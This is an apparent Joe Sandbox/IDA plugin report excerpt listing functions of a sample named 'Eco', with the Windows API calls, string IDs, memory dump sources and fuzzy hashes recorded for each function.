                          • Instruction ID: 44434cd977f0a04cddfae530127b886d9522e82b7f95f30c31edc9bd461150c7
                          • Opcode Fuzzy Hash: 0f2bdb2035bdbb7b6fe639aae7b3cd93a6f67c94cbd217e5c8dcaa9b2bdb2157
                          • Instruction Fuzzy Hash: C9313871C0151AABCF01EFA0DC89AEFBFB9FF19310F100019EC15A6166EB315916DB64
                          Function 00596E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00596F04
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00596F40
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 051a1168a517de7a8237cfe61b55cabc77bf693e50c22ec7e0b327e67693f4e1
                          • Instruction ID: c60dac2b9927703ba8d56a979779c474edd171d06476e2952d1345ddff2770c0
                          • Opcode Fuzzy Hash: 051a1168a517de7a8237cfe61b55cabc77bf693e50c22ec7e0b327e67693f4e1
                          • Instruction Fuzzy Hash: CC31AD71110608AEEF109F78DC80AFB7BA9FF88724F009619F9A587190DB31AC85DB60
                          Function 00572EB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00572F24
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00572F5F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: eb71903a7483c8b58395cab5ed784bc45d094b2e47139db484b944bc22415b24
                          • Instruction ID: b36cc4a3b245313c98b5ec4beace46d69ca4f85b592c599783037fe0ac185e79
                          • Opcode Fuzzy Hash: eb71903a7483c8b58395cab5ed784bc45d094b2e47139db484b944bc22415b24
                          • Instruction Fuzzy Hash: 5E3199326003069FDB259F58E84ABAEBFF9FF45350F14801AEDC9D6190E7709A44EB51
                          Function 00596AC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596B4E
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00596B59
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 56cdef6cd69641e42f461ecb155c5857cf3fa4dba4a945a0e541540154ef3234
                          • Instruction ID: 934e8adffd49f276c35954ae99efa5b5ff99396fbfc569724998ddb6d70b1789
                          • Opcode Fuzzy Hash: 56cdef6cd69641e42f461ecb155c5857cf3fa4dba4a945a0e541540154ef3234
                          • Instruction Fuzzy Hash: 8E116D71300209AFEF219E54DC91EFB3F6BFB983A4F204129F918D7290E6719C559760
                          Function 0059B18A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetActiveWindow.USER32 ref: 0059B1C3
                          • EnumChildWindows.USER32(?,0059AEA3,00000000), ref: 0059B23D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ActiveChildEnumLongWindows
                          • String ID: X
                          • API String ID: 3814560230-1481879230
                          • Opcode ID: 21bee2ae19b9159de250de1b1f016ca7af08721a32a2777bb0aadfb611eff545
                          • Instruction ID: 67a17b2be2bbf4fa3a64526d2d4fa563469c3d74fbe6486a6138021112f493b0
                          • Opcode Fuzzy Hash: 21bee2ae19b9159de250de1b1f016ca7af08721a32a2777bb0aadfb611eff545
                          • Instruction Fuzzy Hash: 16212C74204601DFEB24DF28E851AA57BF5FF9A321F20461EE865873A0C730A855EB60
                          Function 00596FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • GetWindowRect.USER32(00000000,?), ref: 0059705E
                          • GetSysColor.USER32(00000012), ref: 00597078
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: ce2fa16b44472ea0b5d764ad4eb31d1756ef642e1b11e6499c49b3fbc2b3229d
                          • Instruction ID: 12999127c6d56932d8f162583a19244fe948ca8fb5a55342010d5f8fa85f7728
                          • Opcode Fuzzy Hash: ce2fa16b44472ea0b5d764ad4eb31d1756ef642e1b11e6499c49b3fbc2b3229d
                          • Instruction Fuzzy Hash: 5D21177262420AAFDF04DFB8CC49AFA7BA8FB49314F004659FE55D3241E635A850DB50
                          Function 00596D0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00596D8F
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00596D9E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 47971c12135d8d81d3fa7224aeacebffc2902136ed3d2b60d09a660aaa9a397e
                          • Instruction ID: 1e6c192da7d2d3457e4a027bd346cb23234902fad07e83b5a9444c5ce2f6f1ec
                          • Opcode Fuzzy Hash: 47971c12135d8d81d3fa7224aeacebffc2902136ed3d2b60d09a660aaa9a397e
                          • Instruction Fuzzy Hash: 76115871610208AEEF109E649C84AFA3B6AFB55368F204614F974971E4C7719C98AB60
                          Function 00572FC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00573036
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00573055
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 90a3076f18f3f52f94b2283c94b2bbe5470a6c815591887a766c6b68734aa7f7
                          • Instruction ID: 16438af5175a15748cb9de07eff31c482617a47edd8d66a5215111b89f81a7ac
                          • Opcode Fuzzy Hash: 90a3076f18f3f52f94b2283c94b2bbe5470a6c815591887a766c6b68734aa7f7
                          • Instruction Fuzzy Hash: FE11B631901214EBDB24DF5CEC4CB9D7BB8BB05724F148066E958A72A0D770AE05F791
                          Function 005134E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(?), ref: 0051351D
                          • DestroyWindow.USER32(?,?,00524E61), ref: 00513576
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: DeleteDestroyObjectWindow
                          • String ID: hZ
                          • API String ID: 2587070983-3824762921
                          • Opcode ID: b12f642b0ce7c0639edfcffe5c4758c98dae1ef7dd85ccb205b70c5c25374f87
                          • Instruction ID: 08094bfd3a685e0f54198a1b51f8b801d8c3989153c8d94a5f8cee972951ee79
                          • Opcode Fuzzy Hash: b12f642b0ce7c0639edfcffe5c4758c98dae1ef7dd85ccb205b70c5c25374f87
                          • Instruction Fuzzy Hash: 42214F70602211CFEB38DB14E868AA53BE2BB64B14B05456BE402D7364DB31DE8AFF41
                          Function 00582686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005826DC
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582705
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: f8405b95214655e4ae4520d3ba15caf024ad20856f76071f6cf190cfcac60219
                          • Instruction ID: 31e4a7b8fc8ac7491e3e98ed8fa7acf4d7b16641834641cedd43a92604c71685
                          • Opcode Fuzzy Hash: f8405b95214655e4ae4520d3ba15caf024ad20856f76071f6cf190cfcac60219
                          • Instruction Fuzzy Hash: FB11A0B0501225BBDB24AF528C88EFBFFA8FB16751F10852AFD05A6040E6706994DBF0
                          Function 0057CF83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0$L,Z
                          • API String ID: 856254489-1023806
                          • Opcode ID: a412f98d7b23c24ae2e993c531bafde8313f6a3f32074fd1586c6ef5b027f0a3
                          • Instruction ID: b29eb661981ee178220caa2d2559fbc45361b10e5d1dc92315c3b26c01029a16
                          • Opcode Fuzzy Hash: a412f98d7b23c24ae2e993c531bafde8313f6a3f32074fd1586c6ef5b027f0a3
                          • Instruction Fuzzy Hash: 5E11B235600205AFCB14EA14D989EADBFB5BF85710F10C049FA095B391DA30ED82DB60
                          Function 0058823D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005884A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00588265,?,00000000,?,?), ref: 005884BF
                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • htons.WSOCK32(00000000,?,00000000), ref: 005882A5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidehtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 2496851823-2422070025
                          • Opcode ID: f083a582e47d83471c558ff2719bc5bf14f89cb26f366fe7e21fe4c758fc6de8
                          • Instruction ID: 423f7dafd22f1f559f53ab03f8f3cec527bcb9171b7aeeaa8275b73297c229d8
                          • Opcode Fuzzy Hash: f083a582e47d83471c558ff2719bc5bf14f89cb26f366fe7e21fe4c758fc6de8
                          • Instruction Fuzzy Hash: 3C11E535200216ABDB10EF54DC4AFBDBB64FF51320F504516ED11672D1DA31A814CB91
                          Function 005697A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0056980E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: a5df5fa647eeb98f16f0557ddb2bbbabb6aa8cb16ca7dd3409643a515791d569
                          • Instruction ID: 253d77f2473ee7d11bed68fb9450f3a7c47839e603fb2757353c045ffa0c6586
                          • Opcode Fuzzy Hash: a5df5fa647eeb98f16f0557ddb2bbbabb6aa8cb16ca7dd3409643a515791d569
                          • Instruction Fuzzy Hash: BB01F575A41225AB8B14EBA4DC55DFE7B6DBFA3320B500619F862A32C1EF315D08C7D0
                          Function 0051BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _wcscat.LIBCMT ref: 005534C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FullNamePath_memmove_wcscat
                          • String ID: c]
                          • API String ID: 257928180-3208348081
                          • Opcode ID: 6717d182fdb3ca58633aa9e9024529999b6e88d694f89be4f75e5e1088172b83
                          • Instruction ID: 14ee164c1d4eab6ce6ca3c52239c73ae5abd9e92c8db64c2d743579c6d03eaa6
                          • Opcode Fuzzy Hash: 6717d182fdb3ca58633aa9e9024529999b6e88d694f89be4f75e5e1088172b83
                          • Instruction Fuzzy Hash: D411C83090021A97DB11EBA4984AEDE7FE8FF59350F1004A6B945D7291DF70DBC89B91
                          Function 005791B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: c505806431d9b91efe4621ff36d475dc439a26c62418710147d175ec226174d2
                          • Instruction ID: aab93b4ec7eb9fbbf8e59697aadf6ea84347b770636e26bf8f523f12d5832440
                          • Opcode Fuzzy Hash: c505806431d9b91efe4621ff36d475dc439a26c62418710147d175ec226174d2
                          • Instruction Fuzzy Hash: 7401F971D042186EDB28CAA8CC5AEAE7FF8EB01311F00819EF556D2181E474A614CB60
                          Function 00569698 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00569706
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: 9c1086a652e762e69af30fdd77f98f8373e8fd2126cff3cef515d2c2b8ca1256
                          • Instruction ID: e6bf6be859f6605f9f3d553bee5a971656b0704fb4196f5fab9df5fd7fcdc1ec
                          • Opcode Fuzzy Hash: 9c1086a652e762e69af30fdd77f98f8373e8fd2126cff3cef515d2c2b8ca1256
                          • Instruction Fuzzy Hash: F201D8B5A411156BDB14EB90D956EFF7FADBF62340F140029B402A32C1DE205E0896F5
                          Function 0056971D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00569789
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: 6472b5a382400ba7a5847cb218894553d66bba5e5ebc65b6a2eeef297fd44e2c
                          • Instruction ID: 6fb84f4db32a2304b85dc007396641700a2eced891baf8c41fdb7a404e053c49
                          • Opcode Fuzzy Hash: 6472b5a382400ba7a5847cb218894553d66bba5e5ebc65b6a2eeef297fd44e2c
                          • Instruction Fuzzy Hash: A401D4B5A511166A8B14EBA4D956EFF7BACEF62300B500125B801A32C1EA214F0892B1
                          Function 00536CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __calloc_crt
                          • String ID: @R]
                          • API String ID: 3494438863-311182925
                          • Opcode ID: 4319d5e5dd3cdde2826f7cc78ae3bfecbab9f76408bcf24dfe15529c1b95eb77
                          • Instruction ID: 65d905869d2bc51d16901f659740c72d0efdc34df2e754f5ed072a045ace4568
                          • Opcode Fuzzy Hash: 4319d5e5dd3cdde2826f7cc78ae3bfecbab9f76408bcf24dfe15529c1b95eb77
                          • Instruction Fuzzy Hash: D1F0AF7634A317AAE7388B59BC01B612FA5F764720F20482FE140CA181E770D8829690
                          Function 00575350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
